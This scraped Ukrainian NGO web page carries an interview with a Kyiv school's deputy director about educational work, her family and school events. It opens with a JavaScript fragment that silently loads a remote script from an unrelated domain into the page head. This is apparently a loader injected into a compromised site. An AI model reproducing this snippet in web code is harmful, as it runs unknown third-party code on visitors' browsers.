, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

ІРИНА ЩЕРБИНА: «ВИХОВНА РОБОТА – ЦЕ МОЄ ЖИТТЯ!»

ІРИНА ЩЕРБИНА: «ВИХОВНА РОБОТА – ЦЕ МОЄ ЖИТТЯ!»

Знайомтесь – Ірина Володимирівна Щербина, заступник директора з виховної роботи спеціалізованої загальноосвітньої школи І-ІІІ ступенів з поглибленим вивченням предметів художньо-естетичного циклу №302 міста Києва.

Кажуть, доля зводить людей, близьких по духу. З Іриною Володимирівною я познайомилася, завдячуючи Світлані Винограденко, голові правління МГО «МОЗІРОН». В колонній залі КМДА проходив захід «Сьогодні дівчата – завтра миротворці». Серед учасників були й представниці школи №302, яких привезла на подію Ірина Щербина.

– Аби не Світлана Винограденко, ми б не знали про такий чудовий захід, – уточнює Ірина Володимирівна. – Світлана – давній друг нашої школи вона організатор багатьох добрих справ, у цій школі вчаться її діти і, звісно, їй не байдуже, як і чим живе школа.

Чим особлива Ваша школа, Ірино Володимирівно?

– Школа наша спеціалізована, з художньо-естетичним напрямком. Є школи спортивні, з вивчення англійської мови, а ось така як наша – єдина в столиці. У нас розвиваються творчі діти, талановиті. Школа користується популярністю. Працюю я тут чотирнадцятий рік.

 – А що на Вашу думку – виховна робота?

– Батьки завели дитину до школи зранку-раненько й до самісінького вечора лишили, а нам потрібно плідно працювати, щоб розвинути дитину. Ні, не просто навчити, а всебічно розвинути її як особистість творчу, талановиту, щоб згодом вона стала лідером. Особисто я намагаюся спрямовувати дітей на те, щоб мали свою точку зору, щоб усі знання могли застосувати в житті. Власне, виховна робота – це моє життя.

– Ви маєте дітей?

– Так, маю дев’ятирічного сина. Павло, четвертокласник, нарешті зрозумів, що у мами 1024 учнів, а він 1025! Він у мене і вірші пише, і малює… Займається футболом, ходить на плавання. А ще йому подобається вивчати англійську мову. Каже, що колись неодмінно поєднає знання комп’ютера і англійської й буде чудовим спеціалістом!

– Ірино Володимирівно, я так зрозуміла, що школа – ваше життя?

– Так. У школі я зранку й до вечора. У нас проходить багато цікавих заходів. Не вперше ми проводимо День захисника України. Запрошуємо на зустрічі батьків, які беруть участь в АТО. До речі, багато наших випускників захищають нашу Вітчизну. Досить цікавим є захід «Школа має талант». Практично всі діти беруть активну участь у різноманітних номінаціях: починаючи від малювання, хореографії, вокального мистецтва, художнього читання й закінчуючи цікавими виробами, які виготовляють своїми руками. А ще я вважаю, що треба робити одну справу. І робити її ідеально! Якщо ще щось робиш паралельно, то обов’язково щось страждає.

– У Вас незвичайне педагогічне покликання, Ірино Володимирівно?

– Мабуть. Раніше мені хотілося бути самостійною і вважати, що всього досягла сама…Хоча, досягла таки сама – завдяки покликанню і генам! Але всьому початок – мама. Моя мама, Валентина Павлівна Щербина (на жаль, покійна) також педагог, була директором 280-ї школи. Отож педагогіка, виховна робота – все це не випадково! Свого часу я отримала грамоту від київської мерії за розвиток молодіжного руху столиці. З учнями об’їздила Україну від Пущі Водиці – до Карпат. Приємно згадати незабутні збори в Артеку…Без школи своє життя не уявляю.

– Можливо, маєте якісь побажання?

Завжди дякую тим, хто поруч. Користуючись нагодою, хочу подякувати Світлані Винограденко, голові правління МГО «МОЗІРОН» за її активність, небайдужість, вчасну підтримку. За те, що обрала саме нашу школу. За те, що має таку добру душу й не втомлюється роздавати добро людям.

Людмила ЧЕЧЕЛЬ

 

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2